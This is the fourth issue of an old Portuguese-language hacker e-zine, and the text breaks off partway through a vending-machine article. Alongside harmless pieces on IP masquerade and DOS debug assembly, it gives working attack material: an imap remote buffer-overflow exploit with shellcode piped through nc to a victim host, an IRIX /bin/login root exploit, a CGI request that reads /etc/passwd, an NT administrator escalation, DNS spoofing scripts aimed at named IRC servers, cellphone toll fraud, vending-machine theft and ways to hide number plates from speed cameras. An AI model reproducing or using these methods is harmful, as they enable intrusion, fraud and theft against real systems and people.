T H E $$Pø"ý$b ,gPø"ý$b ,gPø""ý$b ,gPø$$$$$$$$ý$b ,gø ý$b $$ $$ $$ $$ $$ $$ $$$$$$ $$ $$ $$ $$ $$ "ý $$ $$ $$$$ $$ $$ $$ $$ $$Pý" ,p $$, ,$$ `$$' $$, ,$$ $$ $$ gg $$ $$$$$$$$$ $$ $$$$$$$$$ $$ $$ $$ $$ $$' `$$ $$ $$' `$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ .$$. $$ $$ T$, gP' T$, gP' $$ $$ $$$$ $$ $$ $$Pýýø" $$Pýýø" "ý ý" $$$$ "ý ý" ý" K N i G H T S ___________________________________TDK______________________________________ ---------------------------------------------------------------------------- Data estelar: 1.0874929520 Data terrestre: 17/08/1998 TDK #04a e-mail: tdk@DeathKnights.com page: http://www.DeathKnights.com melhor visualizado com joe -asis e terminal com setfont alt-8x16. (linux) melhor visualizado com edit. (dos) ___________________________________TDK______________________________________ ---------------------------------------------------------------------------- .-----------. | SECOES \_______________________________________________________________ `----------------------------------------------------------------------------' 1 * ESCLARECiMENTOS Cacaio 2 * Radares Eletronicos Cacaio -=[ ESPECIAL SPOOF ]=- 3 * Injection Spoof James007 4 * Como spoofar localmente Bloody Killer (BK) -=[X]=- 5 * IP MASQUERADE red_evil (colaborador) 6 * Tutorial de asm! Hunter^Heads 7 * Mais sobre celulares REBOOT 8 * Admnistrador no NT ReNeGaDe 9 * Exploit - CGI & Stuff ReNeGaDe 10 * Maquinas de cold drinks Cacaio 11 * HTML DoS (simples d+) Cacaio 12 * VIRUS DE MACRO Milly 13 * A arte de matar Cacaio -- 14 * FEW WORDS Cacaio -=[ 1 ]=- .----------------. | ESCLARECiMENTOS \__________________________________________________________ `----------------------------------------------------------------------------' Nao nos responsabilizamos pela informacao contida neste zine. Se voce usar indevidamente qualquer informacao contida aqui, a responsabilidade e' to- da sua. Se for pego, preso ou sei la o que, nao nos perturbe. Neste zine contamos com uma materia do nosso amigo red_evil, que nao e' um membro dos The Death Knights, mas como nos mandou a materia e achamos interessante, a publicaremos. Valeu mano! Ah, eu ja tinha preparado a materia quanto aos radares eletronicos quando a revista veja lancou uma materia parecida, mas nao e' por isso que eu deixei de fora minha materia, esta neste zine. Este grupo nao visa nenhum fim lucrativo. Nos fazemos isto por diver- sao e nada mais. Se voce nao gostou da informacao contida aqui, nao nos perturbe. O problema e' todo seu. -=[ 2 ]=- .--------------------. | Radares Eletronicos \______________________________________________________ `----------------------------------------------------------------------------' by Cacaio Voce esta' cansado de levar tanta multa por excesso de velocidade? Quando estas multas vem dos Radares Eletronicos, os quais chamarei de 'pardais', elas so chegam a voce se voce bobear. Citarei dois metodos de a sua placa nao ser identificada nas fotografias. Testem, realmente funcionam. .------------------. | Tinta Esmalte `--------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Metodo simples, que para descobrir basta usar um pouco de logica. Pinte sua placa com tinta esmalte nas cores PRETA para letras e numeros, e a cor PRATA LUMINESCENTE para o fundo. Quando o flash bate, esta tinta funciona como um espelho e o flash volta para a lente. Na fotografia sai apenas um clarao no lugar da placa. Nao acredita? Pegue um pedaco de metal, pinte com tinta esmalte como a placa, e tire uma foto com flash. Agora revele e se surpreenda com o resultado. Funciona com todos os pardais. .-----------------. | Compact Disk `---------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Voce pergunta: O que? Compact Disk? CD? Exatamente!!! Coloque um CD no painel do carro na reta da placa, bem perto do capo, se os pardais de sua cidade tirarem foto da frente do veiculo (o que e o mais comum). Se o pardal tirar foto da parte traseira do carro nao tem jeito. Mas o que o CD tem a ver com isso? E' o seguinte, a foto que o pardal tira e' digital , e, como a lente e' a mesma do CD player, vai procurar pelas faixas do CD. Na foto aparecera um clarao na foto inteira, quase toda branca. Funciona com pardais que operam em sistema digital. Use esta informacao como quiser. Cacaio Cacaio@DeathKnights.com `'`'`' `'`'`'`'`'`'`'`'`'`'`'` -=[ 3 ]=- .------------------. | Injection Spoof \________________________________________________________ `----------------------------------------------------------------------------' by James007 Bem, eh a primeira vez que escrevo para a TDK, e resolvi escrever sobre esse assunto, vamos dizer... interessante...... Vou comecar explicando como spoofar usando 2 maquinas ( mais seguro, pois voce nao vai precisar deixar o named killado na maqina principal ;) Primeiro, voce deve considerar que voce precisa de 2 maquinas em uma rede, as duas sendo Linux ( nao pode ser outro UNIX ), sendo que uma precisa ser NS primario com autoritative answer... Comecando.... Vamos dizer que vc tenha root na maquina netgo3.netgo.com.br, que eh NS primario com nameserver authotidative.. e que voce tenha root na james007.netgo.com.br que *nao* eh nameserver.... vc vai na netgo3.netgo.com.br e indica a james007.netgo.com.br no named sendo nameserver... exemplo: netgo3 IN NS james007.netgo.com.br ai vc killa o named dessa maquina ( netgo3.netgo.com.br ) e executa denovo. Agora voce loga como root na james007.netgo.com.br e killa o named dela se tiver rodando named.. ai.. vc vai mandar o injection.c ( q jah vem nessa edicao da TDK ) para a james007.netgo.com.br e compile.... Depois de compilado, execute o injection com a seguinte sintaxe: ./injection senha > /dev/null 2> /dev/null & Agora, voce vai pegar um shell script, q jah vem nessa edicao, chamado cache, e vai editar ele... Edite as seguintes linhas: PASSWORD=senha INJ_SERVER=maquina.que.roda.o.injection SPOOF_SERVER=maquina.que.da.ns.ao.injection No "PASSWORD=" coloque a senha que vc escolheu.. no "INJ_SERVER=" coloca a host da maquina q roda o injection e no "SPOOF_SERVER=" voce coloca a host da maquina q da NS ao injection agora tah prontinho.. O cache fica na sua maquina ai vc executa ele assim: cache seu-ip seu-ip-spoofado irc.servidor-onde-vc-quer-spoofar.com.br e prontow.. ;) Agora vou explicar usando soh uma maquina, que no caso precisa ser NS primario com authoridative answer.. Voce loga como root nessa maquina.... kille o named.. e execute o injection com os mesmos parametros... ai na hora de configurar o cache, vc coloca no INJ_SERVER e no SPOOF_SERVER a mesma host.. e tah valendo..... ;) Ai eh soh executa o cache na sua maquina da mesma forma.. simples naum?! ;) soh tem um problema.. nao eh bom ficar killando o named, rodando o injection, depois killar o injection, e rodar o named.... o root pode perseber.. alem do mais.. pode dar pau nas hosts da provedora.. por isso.... tome cuidado com o q faz.... ;) Eh isso ai... tah ai... pra mim eh a forma mais facil de spoofar... eu particularmente nao gosto de programas to tipo jizz, e da familia.. ;) Eh isso ai d00z! tah ai.. agora eh soh vc arranjar uma NS primario q tenha authoridative answer e enjoy.. ah.. jah ia me eskecendo da lista de servers q da pra spoofar... Vou colocar soh servers da brasirc.. nao vou falar nenhum da brasnet nem rede brasil: irc.eribeiro.com.br irc.sercomtel.com.br irc.summer.com.br Eh.. tah bom. chega.. ;) OBS: O injection.c e o script cache vem anexos a este zine. James007 James@DeathKnights.com `'`'`'`' `'`'`'`'`'`'`'`'`'`'`' -=[ 4 ]=- .--------------------------. | Como spoofar localmente \________________________________________________ `----------------------------------------------------------------------------' by BK Hi d0oDz! bom... pra criancada que sempre quis spoofar e nao tem shell pra isso, e' simples .. basta seguir esses passos: (no final colocarei um exemplo de tudo) 1-) Va na ml.org ou dyndns.com e crie um dominio dinamico pra voce 2-) Pegue o jizz (se vc nao achar nao tem problema.. to mandando junto com a TDK). 3-) Configure e rode o named na sua maquina. 4-) Agora a parte mais dificil, consiga com alguem que tem shell ou entao algum lugar que forneca NS free(procure q vc acha) e coloque IN NS com seu dominio dinamico. 5-) Agora configure seu database (do named da sua maquina) 6-) Depois de tudo configurado e funcionando, kille seu named e execute este script -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #!/bin/sh #Script por ][MoSCa][ - BrasNET HOST=$RANDOM NSDOMAIN=your.ns.org #domain we control DEVICE=ppp0 #name of device we want to use MEUIP=$1 if [ $# -ne '3' ]; then echo "usage: $0 " exit fi killall jizz sleep 1 jizz $HOST.$NSDOMAIN $NSDOMAIN $MEUIP $NSDOMAIN $MEUIP $2 & nslookup < /dev/null 2> /dev/null server $3 set q=soa $HOST.$NSDOMAIN exit END RESULT=`nslookup $MEUIP $3 | grep Name | cut -d ":" -f2` echo echo -= $RESULT IN A $MEUIP =- echo sleep 1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Como usar: bash# script (o jizz deve estar no mesmo diretorio q este script) exemplo de database -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- @ IN SOA your.ns.org. root.your.ns.org. ( 980131170 ; Serial 300 ; Refresh 120 ; Retry 660 ; Expire 600) ; TTL IN NS seu.dominio-dinamico.org. www IN A 200.200.200.200 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- no /etc/resolv.conf nao use 127.0.0.1 como nameserver pois apartir da hora q vc killar o named nao vai resolver mais nada na sua maquina entao coloque por exemplo: domain convex.com.br nameserver 200.210.55.241 tudo certo, so tentar. PS: Irc Server com Vulnerabilidade no Bind (eu acho q ainda funciona) BrasNET irc.certto.com.br BrasIRC irc.eribeiro.com.br bom, e' isso... se nao entendeu leia de novo, leia outros documentos ou qualquer outra coisa, menos ficar me mandando PVT no IRC cYa d0oDz! Bloody Killer bk@deathknights.com `'`'`'`'`'`'` `'`'`'`'`'`'`'`'`'` -=[ 5 ]=- .----------------. | IP MASQUERADE \__________________________________________________________ `----------------------------------------------------------------------------' by red_evil O IP MASQUERADE e' um modo de conectar computadores `a internet , ou `a outra rede, por intermedio de apenas um IP, um computador. A grosso modo, se voce tem uma conexao dial-up, voce pode ligar a sua rede interna, a internet, apenas usando o masquerade. Para implantar o IP MASQUERADE, o primeiro passo e' ter um servidor rodando Linux, de preferencia a ultima versao, com o kernel compilado, com o suporte a IP MASQUERADE ativado. (CONFIG_IP_FORWARD=y> O IP FORWARDING e' o recurso do kernel q permite o 'repasse' de pacotes entre dispositivos, no caso, seu modem e sua interface de rede. Alem disso, voce deve ter sua rede funcionando ok, com ips atribuidos, e bem definidos, e se possivel um named rodando, para facilitar as coisas. Todos os computadores deve estar devidamente inseridos na tabela de roteamento do kernel. Obviamente, este nao e' o unico requisito para que o ip forwarding rode ok no seu sistema. Eu pessoalmente recomendo habilitar todas as opcoes relacionadas com ip, exceto as relacionadas com ROUTING. Com o IP Forwarding habilitado, o proximo passo e' pegar o ipfwadm, o utilitario necessario para administrar este recurso. Apos pegar este arquivo, descompactar LER O README, e coloca-lo no /sbin, voce deve fazer um script para ativa-lo. Este script esta' anexo ao zine (tdk04.zip). Alem disso, voce deve setar nas outras maquinas o ip do seu computador conectado, como gateway ( ou default) .. geralmente no linux eh route add -host ip.do.micro, e depois route add default gw ip...algo assim ( qquer duvida, man route ). E pronto. E' so isso ! Obviamente, voce deve observar todas os procedimentos para a seguranca do seu sistema, mas ai ja' e' outro texto. .-------------------. | Agradecimentos `-------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Como sempre, sozinho nao da' pra fazer nada, o meu objetivo com esta materia e' um modo pratico de por o masquerade funcionando, mas obviamente existe muito mais que isso. Espero que com ele funcionando, a pessoa se anime a procurar outros usos para ele, tal como firewall e muito mais. Agradeco ao pmci ( icmp ) e ao |UnDeR| pelos toques importantissimos. red_evil red_evil@uground.org `'`'`'`' `'`'`'`'`'`'`'`'`'`' -=[ 6 ]=- .----------------------------. | Tutorial de asm parte II! \______________________________________________ `----------------------------------------------------------------------------' by Hunter^Heads bom vamos , falar sobre programacao ? kx.. tipo primeiramente bora aprender a mexer com o debug.. como criar um programa em debug : * Desenvolvimento do algoritmo, estagio em que o problema a ser solucionado B estabelecido e a melhor solucao e proposta, criacao de diagramas esquematicos relativos E melhor solucao proposta. * Codificacao do algoritmo, o que consiste em escrever o programa em alguma linguagem de programacao; linguagem assembly neste caso espec!fico, tomando como base a solucao proposta no passo anterior. * A transformacao para a linguagem de m quina, ou seja, a criacao do programa objeto, escrito como uma sequencia de zeros e uns que podem ser interpretados pelo processador. * O ultimo estagio e a eliminacao de erros detectados no programa na fase de teste. A correcao normalmente requer a repeticao de todos os passos, com observacao atenta. bom os principais passos foram tomados.. agora bora brincar de registrador da merda da sua maq. Para o proposito didatico, vamos focar registradores de 16 bits. A CPU possui 4 registradores internos, cada um de 16 bits. Sao eles AX, BX, CX e DX. Sao registradores de uso geral e tambem podem ser usados como registradores de 8 bits. Para tanto devemos referencia-los como, por exemplo, AH e AL, que sao, respectivamente, o byte high e o low do registrador AX. Esta nomenclatura tambem se aplica para os registradores BX,M CX e DX. ES Registrador de Segmento Extra SS Registrador de Segmento de Pilha CS Registrador de Segmento de Codigo BP Registrador Apontador da Base SI Registrador de indice Fonte DI Registrador de indice Destino SP Registrador Apontador de Pilha IP Registrador Apontador da Prixima Instrucao F Registrador de Flag AX Registrador Acumulador BX Registrador Base CX Registrador Contador DX Registrador de Dados DS Registrador de Segmento de Dados Para a criacao de um programa em assembler existem 2 opGdes: usar o TASM -M Turbo Assembler da Borland, ou o DEBUGGER. Nesta primeira vamos usar o debug, uma vez que podemos encontr -lo em qualquer PC com o MS-DOS. Debug pode apenas criar arquivos com a extensao .COM, e por causa das caracteristicas deste tipo de programa, eles nao podem exceder os 64 Kb, e tambem devem iniciar no endereco de memoria 0100H dentro do segmento especifico. E importante observar isso, pois deste modo os programas .COM nao sao relocaveis. .-----------------------------. | principais comandos do debug `---------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - A Montar instrucoes simbolicas em codigo de maquina D Mostrar o conteudo de uma area da memoria E Entrar dados na memoria, iniciando num endereco especifico G Rodar um programa executavel na memoria N Dar nome a um programa P Proceder, ou executar um conjunto de instrucoes relacionadas Q Sair do programa debug -> este vc jah sabia? eaheha R Mostrar o conteudo de um ou mais registradores T Executar passo a passo as instrucoes U Desmontar o codigo de m quina em instrucoes simbolicas W Gravar um programa em disco E possivel visualizar os valores dos registradores internos da CPU usando o programa Debug. Debug e um programa que faz parte do pacote do DOS, e pode ser encontrado normalmente no diretorio C:\DOS. Para inicia-lo, basta digitar Debug na linha de comando: M C:#:)>Debug [Enter] Voce notara entao a presenca de um hifen no canto inferior esquerdo da tela.Nao se espante, este e o prompt do programa. Para visualizar o conteudo dosM registradores, experimente:buuuuh -r[Enter] AX=0000 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0100 NV UP EI PL NZ NA PO NC 0D62:0100 2E CS: 0D62:0101 803ED3DF00 CMP BYTE PTR [DFD3],00 CS:DFD3=03 E mostrado o conteudo de todos os registradores internos da CPU; um modo alternativo para visualizar um unico registrador e usar o camando "r" seguido do paremetro que faz referencia ao nome do registrador: -rbx BX 0000 :MC Esta instrucao mostrar o conteudo do registrador BX e mudar o indicador do Debug de "-" para ":" Quando o prompt assim se tornar, significa que e poss!vel, embora nao obrigatoria, a mudanca do valor contido no registrador, bastando digitar o novo valor e pressionar [Enter]. Se voce simplesmente pressionar [Enter] o valor antigo ira se manter. .-------------------------. | Estrutura Assembly `-------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Nas linhas do codigo em Linguagem Assembly e duas partes: a primeira e o nome da instrucao a ser executada; a segunda, os parimetros do comando. Por exemplo: add ah bh Aqui "add" B o comando a ser executado, neste caso uma adicao, e "ah" bem como "bh" sao os parimetros. Por exemplo: mov al, 25 No exemplo acima, estamos usando a instrucao mov, que significa mover o valor 25 para o registrador al. M O nome das instrucoes nesta linguagem e constitu!do de 2, 3 ou 4 letras. Estas instrucoes sao chamadas codigos de operacao,representando a funcao que o processador executar . as vezes instrucoes aparecem assim: add al,[170] Os colchetes no segundo parimetro indica-nos que vamos trabalhar com o conteudo da celula de memoria de numero 170, ou seja, com o valor contido no endereco 170 da memoria e nao com o valor 170, isto e conhecido como enderecamento direto. O primeiro passo e iniciar o Debug, o que jah vimos como fazer anteriormente. Para montar um programa no Debug, e usado o comando "a" (assemble); quando usamos este comando, podemos especificar um endereco inicial para o nosso programa como o parimetro, mas e opcional. No caso de omissao, o endereco inicial e o especificado pelos registradores CS:IP, geralmente 0100h, o local em que programas com extensFo .COM devem iniciar. E ser este o local que usaremos, uma vez que o Debug so pode criar este tipo de programa. Embora neste momento nao seja necessario darmos um parimetro ao comando "a", isso e recomendavel para evitar problemas, logo: a 100[enter] mov ax,0002[enter] mov bx,0004[enter] add ax,bx[enter] nopA[enter][enter] O que o programa faz? Move o valor 0002 para o registrador ax, move o valor 0004 para o registrador bx, adiciona o conteudo dos registradores ax e bx, guardando o resultado em ax e finalmente a instrucao nop (nenhuma operacao) finaliza o programa. No programa debug, a tela se parecer com: C:\>debug -a 100 0D62:0100 mov ax,0002 0D62:0103 mov bx,0004 0D62:0106 add ax,bx 0D62:0108 nop 0D62:0109 Entramos com o comando "t" para executar passo a passo as instrucoes: -t AX=0002 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0103 NV UP EI PL NZ NA PO NC 0D62:0103 BB0400 MOV BX,0004 Vemos o valor 0002 no registrador AX. Teclamos "t" para executar a segunda instrucao: -t AX=0002 BX=0004 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0106 NV UP EI PL NZ NA PO NC 0D62:0106 01D8 ADD AX,BX Teclando "t" novamente para ver o resultado da instrucao add: -t AX=0006 BX=0004 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0108 NV UP EI PL NZ NA PE NC 0D62:0108 90 NOP A possibilidade dos registradores conterem valores diferentes existe, mas AX e BX devem conter os mesmos valores acima descritos. Para sair do Debug usamos o comando "q" (quit). carregando / armazenando os bixinhos Nao seria pratico ter que digitar o programa cada vez que iniciassemos o Debug. Ao inves disso, podemos armazen -lo no disco. so que o mais interessante nisso e que um simples comando de salvar cria um arquivo com a extensao .COM, ou seja, executavel - sem precisarmos efetuar os processos de montagem e ligacao, como veremos posteriormente com o TASM. Eis os passos para salvar um programa que ja esteja na memoria: * Obter o tamnho do programa subtraindo o endereco final do endereco inicial, naturalmente que no sistema hexadecimal. * Dar um nome ao programa. * Colocar o tamanho do programa no registrador CX. * Mandar o debug gravar o programa em disco. Usando como exemplo o seguinte programa, vamos clarear a ideia de como realizar os passos acima descritos: 0C1B:0100 mov ax,0002 0C1B:0103 mov bx,0004 0C1B:0106 add ax,bx 0C1B:0108 int 20 0C1B:010A Para obter o tamanho de um programa, o comando "h" e usado, ja que ele nos mostra a adicao e subtracao de dois numeros em hexadecimal. Para obter o tamanho do programa em questao, damos como parimetro o valor do endereco final do nosso programa (10A), e o endereGo inicial (100). O primeiro resultado mostra-nos a soma dos enderecos, o segundo, a subtracao. -h 10a 100 020a 000a O comando "n" permite-nos nomear o programa. -n test.com O comando "rcx" permite-nos mudar o conteudo do registrador CX para o valor obtido como tamanho do arquivo com o comando "h", neste caso 000a. -rcx CX 0000 :000a Finalmente, o comando "w" grava nosso programa no disco, indicando quantos bytes gravou. -w Writing 000A bytes Para ja salvar um arquivo quando carreg -lo, 2 passos sao necessarios: Dar o nome do arquivo a ser carregado. Carrega-lo usando o comando "l" (load). Para obter o resultado correto destes passos, e necessario que o programa acima ja esteja criado. Dentro do Debug, escrevemos o seguinte: -n test.com -l -u 100 109 0C3D:0100 B80200 MOV AX,0002 0C3D:0103 BB0400 MOV BX,0004 0C3D:0106 01D8 ADD AX,BX 0C3D:0108 CD20 INT 20 O ultimo comando "u" e usado para verificar que o programa foi carregado na memoria. O que ele faz e desmontar o codigo e mostra-lo em assembly. Os parimetros indicam ao Debug os enderecos inicial e final a serem desmontados. O Debug sempre carrega os programas na memoria no endereco 100h, conforme ja comentamos. Hunter^Heads HunterH@deathknights.com `'`'`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`' -=[ 7 ]=- .-----------------------. | Mais sobre celulares \___________________________________________________ `----------------------------------------------------------------------------' by REBOOT Ae pessoal, blz ? Olha eu aki mais uma vez, agora falando um pouco sobre telefonia celular. Bom, as duas dicas abaixo eu soh testei nos aparelhos da marca MOTOROLA, pois eh a marca dos aparelhos q eu utilizo. .--------------. | 1a DICA `------------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Quando voce faz a programacao para quando alguem ligar para o numero do celular de um cara e essa ligacao chamar no teu aparelho utilizando: FCN 0 00000000000 RCL daih aparece o numero 01 agora eh soh pressionar a tecla ( * ) ateh aparecer o numero 03 ih logo em seguida aparecerah o numero do teu celular, dae eh soh vc mudar pro numero dele ih pressionar a tecla ( * ) + SND Vc soh pode fazer essa mudanca apenas 15x, apos isso o aparelho deixa vc mudar o numero para o teu ou para outro (1 meio eh na TELE), mas aki estah 1 metodo blz pra sempre zerar as 15 mudancas, ae vai: FCN 0 0**83786633 # 32 # (ousa um som beim longo. pronto td resetado) .--------------. | 2a DICA `------------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Para utilizar seu celular sem pagar ligacoes estah sendo muito utilizado o seguinte metodo: 2345678 (exemplo do numero pra queim vc quer ligar) RCL *** Pronto, soh isso, num doe nada, principalmente no seu bolso. Teh a proxima. REBOOT reboot@deathknights.com `'`'`' `'`'`'`'`'`'`'`'`'`'`'` -=[ 8 ]=- .----------------------. | Administrador no NT \____________________________________________________ `----------------------------------------------------------------------------' by ReNeGaDe Hi All! Vamos lah para mais uma materia para mostrar aos provedores, que usam o NT, diferente de qualquer workstation UNIX devidamente blindada e protegida localmente. Assim podendo ser invadida por qualquer funcionario malz intencio- nados do mesmo. Nao quero dizer que um sistema UNIX tambem nao pode ser invadi do mais pelo menos nao facilmente assim. Facilmente se chega a obter privilegios de Administrador no NT: Um usuario normal tem acesso de escrita no diretorio winnt\system32 Ele muda o logon.scr para logon.old Ele muda o usrmgr.exe (ou musrmgr.exe nas Workstations) para logon.scr Ele da um shut down na maquina utilizando a opcao "close all programs and log on as different user" Aguarda... O sistema vai iniciar o logon.scr... User Manager vai ser carregado... O usuario entao seleciona o seu dominio Adiciona ele mesmo para o grupo de Adminstrador Ele sai e loga de novo... Possivel solucao: Ter certeza que os usuarios so possuam acesso de leitura para o diretorio winnt\system32. Ter certeza que o registro tem as permissoes corretas para que o usuario possa especificar um local diferente para o logon.scr ReNeGaDe renegade@deathknights.com `'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'` -=[ 9 ]=- .-----------------------. | Exploits - CGI & Stuff \___________________________________________________ `----------------------------------------------------------------------------' by ReNeGaDe Mais uma para voces! Para tentar um exploit, e' melhor ter uma conta no seu alvo(se possivel). Aqui irao alguns poucos exploits pra voce se divertir! E tambem ah falha de cgi para get passwd do faxsurvey. 1) Exploit para novo bug do imap.. -------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- /* * Here goes another imap remote exploit * The Death Knights www.deathknights.com * by ReNeGaDe - ReNeGaDe@DeathKnights.com * * hey kiddies, it's 4 linux ! :) * play around but be nice and careful - test it only against your own machine * this code is only for educational purpose. * * renegade:~# (./imaprulez 100; cat) | nc victim.org 143 * (you can provide an offset or use the default 100) * * thanks for c0nd0r - condor@uground.org * * this code is heavly based on Cheez Whiz code * So give him the credit : cheezbeast@hotmail.com * I just found out the esp and fix things up * */ #include #include #include #include #define BUFLEN (2*1024) #define NOP 0x90 char shell[] = "\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07" "\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f" "\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06" "\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff" "\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02" "\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char buf[BUFLEN]; unsigned long int nop, esp; long int offset; void main (int argc, char *argv[]) { int i; nop = 403; offset = 100; if (argc > 2) nop = atoi(argv[2]); if (argc > 1) offset = atoi(argv[1]); esp = 0xbffff501; memset(buf, NOP, BUFLEN); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4) *((int *) &buf[i]) = esp + offset; printf("* AUTHENTICATE {%d}\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } -------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 2) Um buffer overflow para voce! Em /bin/login. O que acontece usuarios locais podem pegar root access. Sistemas vulneraveis Irix 5.3 Irix64 6.2 Irix 6.3. Solucao temporaria: chmod u-s /bin/login Compile o exploit usando '-n32' flag pra compiling under 6.x -------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- /* /bin/login exploit by DCRH 24/5/97 * * The Death Knights www.deathknights.com * by ReNeGaDe - ReNeGaDe@DeathKnights.com * * Tested on: R3000 Indigo (Irix 5.3) * R4400 Indy (Irix 5.3) * R5000 O2 (Irix 6.3) * R8000 Power Challenge (Irix 6.2) * * Compile as: cc -n32 login.c (for Irix 6.x) * cc login.c (for Irix 5.x) * * Press enter when prompted for a password * */ #include #include #include #include #include #define BUF_LENGTH 200 #define EXTRA 300 #define OFFSET 0x1b0 #define IRIX_NOP 0x03e0f825 /* move $ra,$ra */ #define u_long unsigned u_long get_sp_code[] = { 0x03a01025, /* move $v0,$sp */ 0x03e00008, /* jr $ra */ 0x00000000, /* nop */ }; u_long irix_shellcode[] = { 0x24041234, /* li $4,0x1234 */ 0x2084edcc, /* sub $4,0x1234 */ 0x0491fffe, /* bgezal $4,pc-4 */ 0x03bd302a, /* sgt $6,$sp,$sp */ 0x23e4012c, /* addi $4,$31,264+36 */ 0xa086feff, /* sb $6,-264+7($4) */ 0x2084fef8, /* sub $4,264 */ 0x20850110, /* addi $5,$4,264+8 */ 0xaca4fef8, /* sw $4,-264($5) */ 0xaca6fefc, /* sw $4,-260($5) */ 0x20a5fef8, /* sub $5, 264 */ 0x240203f3, /* li $v0,1011 */ 0x03ffffcc, /* syscall 0xfffff */ 0x2f62696e, /* "/bin" */ 0x2f7368ff, /* "/sh" */ }; char buf[BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv) { char *env[] = {NULL}; u_long targ_addr, stack; u_long *long_p; int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code; stack = get_sp(); long_p =(u_long *) buf; targ_addr = stack + OFFSET; if (argc > 1) targ_addr += atoi(argv[1]); while ((targ_addr & 0xff000000) == 0 || (targ_addr & 0x00ff0000) == 0 || (targ_addr & 0x0000ff00) == 0 || (targ_addr & 0x000000ff) == 0) targ_addr += 4; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP; for (i = 0; i < code_length/sizeof(u_long); i++) *long_p++ = irix_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = (targ_addr << 24) | (targ_addr >> 8); *long_p = 0; printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr); execle("/bin/login", "login", "-h", &buf[1], 0, env); perror("execl failed"); } -------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 3) Falha de cgi no 'faxsurvey' CGI-Script... "http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd" Eh isso ae pessoal aqui se encerram minhas materias nessa TDK! Se tiverem interesse em tirar duvidas ou apresentar novas ideias, aqui estah o meu email. Mais sem babozeiras hein pessoal vamos ter um bom senso pois nao sou desocupado. cya l8er! ReNeGaDe renegade@deathknights.com `'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'` -=[ 10 ]=- .------------------------. | Maquinas de cold drinks \__________________________________________________ `----------------------------------------------------------------------------' by Cacaio Ae bando de doido, esse texto foi originalmente escrito em frances por Oliver Clothezoffe, e eu fiz a traducao e algumas modificacoes para que funcio ne aqui no Brasil. Ok? Bele.. Olha so' o detalhe, se voce usar essa dica em maquinas que cobram R$1,00, voce nao ganha nenhum centavo, so' a bebida. Mas se usar nas de R$0,75, voce ainda ganha R$0,25 de troco, mas como voce nao gastou nada, voce so vai ganhando grana. Quanto mais bebidas voce pegar, mais grana!!! Antes de voce fazer isso, deixa eu limpar minha barra, eu nao fui pego fazendo isso, e isso nao funciona em todas as cold drink machines(falo cold drink por que tem de coca, de cerveja, de suco, etc...). Mas se voce for muito mane' e for pego, nao vem falar de mim. Entao, leia isso como se fosse somente para fins informativos, nao para fazer grana ou pegar bebidas gratis! Assim, eu nao posso parar voce de pegar esse zine e ler isso so pra me proteger, entao voce que fara' tudo, sem meu auxilio em nada ok?? Agora que eu ja limpei minha barra, como pegar bebidas gratis. Mas eu falo novamente... isso nao funciona em todas as maquinas, somente em algumas. As melhores para se fazer isso sao do primeiro modelo, aquele que tem o buraco pra se colocar as moedas se nao quiser usar cedula. .----------------------. | Preparando a cedula `----------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - -> Pegue uma nota novinha de um real (sem nenhum pedaco rasgado, sem estar amassada ou riscada, novinha mesmo). Com a nota nova isso com certeza funcionara'. -> Pegue uma daquelas fitas que sao usadas para lacrar isopor de frios em 